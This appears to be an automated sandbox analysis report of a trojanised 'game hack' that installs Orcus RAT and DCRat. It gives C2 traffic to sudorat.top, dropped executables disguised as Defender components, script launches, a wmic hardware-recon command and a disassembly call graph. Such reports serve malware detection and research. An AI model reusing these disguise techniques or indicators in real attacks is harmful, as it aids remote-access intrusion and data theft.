                                    Jan 13, 2025 13:36:26.340481043 CET4997925350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:26.345298052 CET2535049979185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:36:26.345360994 CET4997925350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:26.345844984 CET4997925350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:26.350559950 CET2535049979185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:36:47.720897913 CET2535049979185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:36:47.720968008 CET4997925350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:47.837014914 CET5002325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:47.982923985 CET2535050023185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:36:47.983020067 CET5002325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:47.984250069 CET5002325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:36:47.989108086 CET2535050023185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:37:09.338479996 CET2535050023185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:37:09.338690042 CET5002325350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:37:09.454456091 CET5003425350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:37:09.459547043 CET2535050034185.37.62.158192.168.2.7
                                    Jan 13, 2025 13:37:09.459645033 CET5003425350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:37:09.460186005 CET5003425350192.168.2.7185.37.62.158
                                    Jan 13, 2025 13:37:09.465022087 CET2535050034185.37.62.158192.168.2.7

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 13, 2025 13:35:21.228759050 CET5379753192.168.2.71.1.1.1
                                    Jan 13, 2025 13:35:21.584316969 CET53537971.1.1.1192.168.2.7

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 13, 2025 13:35:21.228759050 CET192.168.2.71.1.1.10x1ea4Standard query (0)25350.client.sudorat.topA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 13, 2025 13:35:21.584316969 CET1.1.1.1192.168.2.70x1ea4No error (0)25350.client.sudorat.top185.37.62.158A (IP address)IN (0x0001)false

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:07:35:12
                                    Start date:13/01/2025
                                    Path:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe"
                                    Imagebase:0xa00000
                                    File size:9'469'375 bytes
                                    MD5 hash:35A0FBEC2FC6D2A550A569719406D58D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:07:35:15
                                    Start date:13/01/2025
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe"
                                    Imagebase:0xcd0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:07:35:15
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe"
                                    Imagebase:0x240000
                                    File size:3'115'520 bytes
                                    MD5 hash:10E817A4D5E216279A8DE8ED71C91044
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: 00000007.00000000.1286933996.0000000000242000.00000002.00000001.01000000.00000009.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: 00000007.00000000.1286933996.0000000000242000.00000002.00000001.01000000.00000009.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: Joe Security
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 84%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:07:35:15
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe"
                                    Imagebase:0xed0000
                                    File size:1'700'533 bytes
                                    MD5 hash:BC7804FCA6DD09B4F16E86D80B8D28FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 66%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:07:35:15
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe"
                                    Imagebase:0x400000
                                    File size:4'796'928 bytes
                                    MD5 hash:E8C32CC88DB9FEF57FD9E2BB6D20F70B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 58%, ReversingLabs
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:11
                                    Start time:07:35:16
                                    Start date:13/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:12
                                    Start time:07:35:16
                                    Start date:13/01/2025
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe"
                                    Imagebase:0xcd0000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:07:35:17
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe"
                                    Imagebase:0xbb0000
                                    File size:3'115'520 bytes
                                    MD5 hash:10E817A4D5E216279A8DE8ED71C91044
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: Joe Security
                                    • Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: RAT_Orcus, Description: unknown, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 84%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:07:35:18
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
                                    Imagebase:0xb20000
                                    File size:3'115'520 bytes
                                    MD5 hash:10E817A4D5E216279A8DE8ED71C91044
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:07:35:18
                                    Start date:13/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                    Imagebase:0xbc0000
                                    File size:65'440 bytes
                                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:21
                                    Start time:07:35:21
                                    Start date:13/01/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
                                    Imagebase:0x410000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:07:35:21
                                    Start date:13/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:23
                                    Start time:07:35:21
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
                                    Imagebase:0xf10000
                                    File size:569'844 bytes
                                    MD5 hash:00C4245522082B7F87721F9A26E96BA4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1959832866.000000001322D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 68%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:24
                                    Start time:07:35:23
                                    Start date:13/01/2025
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "
                                    Imagebase:0x410000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:25
                                    Start time:07:35:23
                                    Start date:13/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:26
                                    Start time:07:35:23
                                    Start date:13/01/2025
                                    Path:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
                                    Imagebase:0x1d0000
                                    File size:1'383'424 bytes
                                    MD5 hash:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1720636580.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001A.00000002.1846009611.00000000125BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 78%, ReversingLabs
                                    Has exited:true

                                    General

                                    Target ID:27
                                    Start time:07:35:23
                                    Start date:13/01/2025
                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                    Wow64 process (32bit):false
                                    Commandline:wmic diskdrive get model,serialnumber
                                    Imagebase:0x7ff641cc0000
                                    File size:576'000 bytes
                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:33
                                    Start time:07:35:29
                                    Start date:13/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
                                    Imagebase:0x7ff6160a0000
                                    File size:2'759'232 bytes
                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:34
                                    Start time:07:35:29
                                    Start date:13/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:38
                                    Start time:07:35:30
                                    Start date:13/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP"
                                    Imagebase:0x7ff668d90000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:9.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:10.3%
                                      Total number of Nodes:1481
                                      Total number of Limit Nodes:25
                                      execution_graph 24821 a096a0 79 API calls 24873 a2e9a0 51 API calls 24824 a1e4a2 38 API calls 2 library calls 24825 a016b0 84 API calls 22947 a290b0 22955 a2a56f 22947->22955 22950 a290c4 22952 a290cc 22953 a290d9 22952->22953 22963 a290e0 11 API calls 22952->22963 22964 a2a458 22955->22964 22958 a2a5ae TlsAlloc 22959 a2a59f 22958->22959 22971 a1ec4a 22959->22971 22961 a290ba 22961->22950 22962 a29029 20 API calls 2 library calls 22961->22962 22962->22952 22963->22950 22965 a2a488 22964->22965 22968 a2a484 22964->22968 22965->22958 22965->22959 22966 a2a4a8 22966->22965 22969 a2a4b4 GetProcAddress 22966->22969 22968->22965 22968->22966 22978 a2a4f4 22968->22978 22970 a2a4c4 __crt_fast_encode_pointer 22969->22970 22970->22965 22972 a1ec53 22971->22972 22973 a1ec55 IsProcessorFeaturePresent 22971->22973 22972->22961 22975 a1f267 22973->22975 22985 a1f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22975->22985 22977 a1f34a 22977->22961 22979 a2a515 LoadLibraryExW 22978->22979 22980 a2a50a 22978->22980 22981 a2a532 GetLastError 22979->22981 22982 a2a54a 22979->22982 22980->22968 22981->22982 22984 a2a53d LoadLibraryExW 22981->22984 22982->22980 22983 a2a561 FreeLibrary 22982->22983 22983->22980 22984->22982 22985->22977 22986 a2a3b0 22987 a2a3bb 22986->22987 22989 a2a3e4 22987->22989 22990 a2a3e0 22987->22990 22992 a2a6ca 22987->22992 22999 a2a410 DeleteCriticalSection 22989->22999 22993 a2a458 __dosmaperr 5 API calls 22992->22993 22994 a2a6f1 22993->22994 22995 a2a6fa 22994->22995 22996 a2a70f InitializeCriticalSectionAndSpinCount 22994->22996 22997 a1ec4a ___delayLoadHelper2@8 5 API calls 22995->22997 22996->22995 22998 a2a726 22997->22998 22998->22987 22999->22990 24826 a21eb0 6 API calls 3 library calls 24875 a279b7 55 API calls _free 24828 a276bd 52 API calls 3 library calls 24879 a25780 QueryPerformanceFrequency QueryPerformanceCounter 23073 a01385 82 API calls 3 library calls 23268 a1d891 19 API calls ___delayLoadHelper2@8 24830 a17090 114 API calls 24831 a1cc90 70 API calls 24880 a1a990 97 API calls 24881 a19b90 GdipCloneImage GdipAlloc 24882 a29b90 21 API calls 2 library calls 24883 a22397 48 API calls 23271 a1d997 23272 a1d89b 23271->23272 23273 a1df59 ___delayLoadHelper2@8 19 API calls 23272->23273 23273->23272 24834 a0ea98 FreeLibrary 24835 a1a89d 78 API calls 23278 a1aee0 23279 a1aeea __EH_prolog 23278->23279 23441 a0130b 23279->23441 23282 a1b5cb 23516 a1cd2e 23282->23516 23283 a1af2c 23285 a1afa2 23283->23285 23286 a1af39 23283->23286 23314 a1af18 23283->23314 23288 a1b041 GetDlgItemTextW 23285->23288 23293 a1afbc 23285->23293 23289 a1af75 23286->23289 23290 a1af3e 23286->23290 23288->23289 23294 a1b077 23288->23294 23299 a1af96 EndDialog 23289->23299 23289->23314 23298 a0ddd1 53 API calls 23290->23298 23290->23314 23291 a1b5f7 23295 a1b611 GetDlgItem SendMessageW 23291->23295 23296 a1b600 SendDlgItemMessageW 23291->23296 23292 a1b5e9 SendMessageW 23292->23291 23297 a0ddd1 53 API calls 23293->23297 23300 a1b08f GetDlgItem 23294->23300 23439 a1b080 23294->23439 23534 a19da4 GetCurrentDirectoryW 23295->23534 23296->23295 23305 a1afde SetDlgItemTextW 23297->23305 23306 a1af58 23298->23306 23299->23314 23303 a1b0c5 SetFocus 23300->23303 23304 a1b0a4 SendMessageW SendMessageW 23300->23304 23302 a1b641 GetDlgItem 23307 a1b664 SetWindowTextW 23302->23307 23308 a1b65e 23302->23308 23309 a1b0d5 23303->23309 23320 a1b0ed 23303->23320 23304->23303 23310 a1afec 23305->23310 23556 a01241 SHGetMalloc 23306->23556 23535 a1a2c7 GetClassNameW 23307->23535 23308->23307 23313 a0ddd1 53 API calls 23309->23313 23310->23314 23319 a1aff9 GetMessageW 23310->23319 23318 a1b0df 23313->23318 23315 a1af5f 23315->23314 23321 a1af63 SetDlgItemTextW 23315->23321 23316 a1b56b 23322 a0ddd1 53 API calls 23316->23322 23557 a1cb5a 23318->23557 23319->23314 23325 a1b010 IsDialogMessageW 23319->23325 23330 a0ddd1 53 API calls 23320->23330 23321->23314 23326 a1b57b SetDlgItemTextW 23322->23326 23325->23310 23328 a1b01f TranslateMessage DispatchMessageW 23325->23328 23329 a1b58f 23326->23329 23328->23310 23331 a0ddd1 53 API calls 23329->23331 23333 a1b124 23330->23333 23334 a1b5b8 23331->23334 23332 a1b6af 23338 a1b6df 23332->23338 23343 a0ddd1 53 API calls 23332->23343 23339 a0400a _swprintf 51 API calls 23333->23339 23341 a0ddd1 53 API calls 23334->23341 23335 a1b0e6 23451 a0a04f 23335->23451 23337 a1bdf5 98 API calls 23337->23332 23345 a1bdf5 98 API calls 23338->23345 23377 a1b797 23338->23377 23340 a1b136 23339->23340 23344 a1cb5a 16 API calls 23340->23344 23341->23314 23349 a1b6c2 SetDlgItemTextW 23343->23349 23344->23335 23350 a1b6fa 23345->23350 23346 a1b847 23351 a1b850 EnableWindow 23346->23351 23352 a1b859 23346->23352 23347 a1b174 GetLastError 23348 a1b17f 23347->23348 23457 a1a322 SetCurrentDirectoryW 23348->23457 23354 a0ddd1 53 API calls 23349->23354 23359 a1b70c 23350->23359 23378 a1b731 23350->23378 23351->23352 23356 a1b876 23352->23356 23575 a012c8 GetDlgItem EnableWindow 23352->23575 23355 a1b6d6 SetDlgItemTextW 23354->23355 23355->23338 23358 a1b89d 23356->23358 23367 a1b895 SendMessageW 23356->23367 23357 a1b195 23362 a1b1ac 23357->23362 23363 a1b19e GetLastError 23357->23363 23358->23314 23369 a0ddd1 53 API calls 23358->23369 23573 a19635 32 API calls 23359->23573 23360 a1b78a 23364 a1bdf5 98 API calls 23360->23364 23368 a1b227 23362->23368 23372 a1b237 23362->23372 23374 a1b1c4 GetTickCount 23362->23374 23363->23362 23364->23377 23366 a1b86c 23576 a012c8 GetDlgItem EnableWindow 23366->23576 23367->23358 23368->23372 23373 a1b46c 23368->23373 23376 a1b8b6 SetDlgItemTextW 23369->23376 23370 a1b725 23370->23378 23380 a1b407 23372->23380 23381 a1b24f GetModuleFileNameW 23372->23381 23473 a012e6 GetDlgItem ShowWindow 23373->23473 23382 a0400a _swprintf 51 API calls 23374->23382 23375 a1b825 23574 a19635 32 API calls 23375->23574 23376->23314 23377->23346 23377->23375 23384 a0ddd1 53 API calls 23377->23384 23378->23360 23385 a1bdf5 98 API calls 23378->23385 23380->23289 23393 a0ddd1 53 API calls 23380->23393 23567 a0eb3a 80 API calls 23381->23567 23388 a1b1dd 23382->23388 23384->23377 23390 a1b75f 23385->23390 23386 a1b47c 23474 a012e6 GetDlgItem ShowWindow 23386->23474 23458 a0971e 23388->23458 23389 a1b844 23389->23346 23390->23360 23394 a1b768 DialogBoxParamW 23390->23394 23392 a1b275 23396 a0400a _swprintf 51 API calls 23392->23396 23397 a1b41b 23393->23397 23394->23289 23394->23360 23395 a1b486 23475 a0ddd1 23395->23475 23399 a1b297 CreateFileMappingW 23396->23399 23400 a0400a _swprintf 51 API calls 23397->23400 23403 a1b2f9 GetCommandLineW 23399->23403 23434 a1b376 __vsnwprintf_l 23399->23434 23404 a1b439 23400->23404 23408 a1b30a 23403->23408 23417 a0ddd1 53 API calls 23404->23417 23405 a1b203 23409 a1b215 23405->23409 23410 a1b20a GetLastError 23405->23410 23406 a1b381 ShellExecuteExW 23432 a1b39e 23406->23432 23568 a1ab2e SHGetMalloc 23408->23568 23466 a09653 23409->23466 23410->23409 23411 a1b4a2 SetDlgItemTextW GetDlgItem 23414 a1b4d7 23411->23414 23415 a1b4bf GetWindowLongW SetWindowLongW 23411->23415 23479 a1bdf5 23414->23479 23415->23414 23416 a1b326 23569 a1ab2e SHGetMalloc 23416->23569 23417->23289 23421 a1b332 23570 a1ab2e SHGetMalloc 23421->23570 23422 a1b3e1 23422->23380 23428 a1b3f7 UnmapViewOfFile CloseHandle 23422->23428 23423 a1bdf5 98 API calls 23426 a1b4f3 23423->23426 23425 a1b33e 23571 a0ecad 80 API calls ___scrt_fastfail 23425->23571 23504 a1d0f5 23426->23504 23428->23380 23431 a1b355 MapViewOfFile 23431->23434 23432->23422 23435 a1b3cd Sleep 23432->23435 23433 a1bdf5 98 API calls 23438 a1b519 23433->23438 23434->23406 23435->23422 23435->23432 23436 a1b542 23572 a012c8 GetDlgItem EnableWindow 23436->23572 23438->23436 23440 a1bdf5 98 API calls 23438->23440 23439->23289 23439->23316 23440->23436 23442 a01314 23441->23442 23443 a0136d 23441->23443 23444 a0137a 23442->23444 23577 a0da98 62 API calls 2 library calls 23442->23577 23578 a0da71 GetWindowLongW SetWindowLongW 23443->23578 23444->23282 23444->23283 23444->23314 23447 a01336 23447->23444 23448 a01349 GetDlgItem 23447->23448 23448->23444 23449 a01359 23448->23449 23449->23444 23450 a0135f SetWindowTextW 23449->23450 23450->23444 23454 a0a059 23451->23454 23452 a0a0ea 23453 a0a207 9 API calls 23452->23453 23455 a0a113 23452->23455 23453->23455 23454->23452 23454->23455 23579 a0a207 23454->23579 23455->23347 23455->23348 23457->23357 23459 a09728 23458->23459 23460 a09792 CreateFileW 23459->23460 23461 a09786 23459->23461 23460->23461 23462 a097e4 23461->23462 23463 a0b66c 2 API calls 23461->23463 23462->23405 23464 a097cb 23463->23464 23464->23462 23465 a097cf CreateFileW 23464->23465 23465->23462 23467 a09677 23466->23467 23468 a09688 23466->23468 23467->23468 23469 a09683 23467->23469 23470 a0968a 23467->23470 23468->23368 23600 a09817 23469->23600 23605 a096d0 23470->23605 23473->23386 23474->23395 23620 a0ddff 23475->23620 23478 a012e6 GetDlgItem ShowWindow 23478->23411 23480 a1bdff __EH_prolog 23479->23480 23481 a1b4e5 23480->23481 23482 a1aa36 ExpandEnvironmentStringsW 23480->23482 23481->23423 23493 a1be36 _wcsrchr 23482->23493 23484 a1aa36 ExpandEnvironmentStringsW 23484->23493 23485 a1c11d SetWindowTextW 23485->23493 23488 a235de 22 API calls 23488->23493 23490 a1bf0b SetFileAttributesW 23492 a1bfc5 GetFileAttributesW 23490->23492 23503 a1bf25 ___scrt_fastfail 23490->23503 23492->23493 23495 a1bfd7 DeleteFileW 23492->23495 23493->23481 23493->23484 23493->23485 23493->23488 23493->23490 23496 a1c2e7 GetDlgItem SetWindowTextW SendMessageW 23493->23496 23500 a1c327 SendMessageW 23493->23500 23643 a117ac CompareStringW 23493->23643 23644 a19da4 GetCurrentDirectoryW 23493->23644 23646 a0a52a 7 API calls 23493->23646 23647 a0a4b3 FindClose 23493->23647 23648 a1ab9a 76 API calls ___std_exception_copy 23493->23648 23495->23493 23497 a1bfe8 23495->23497 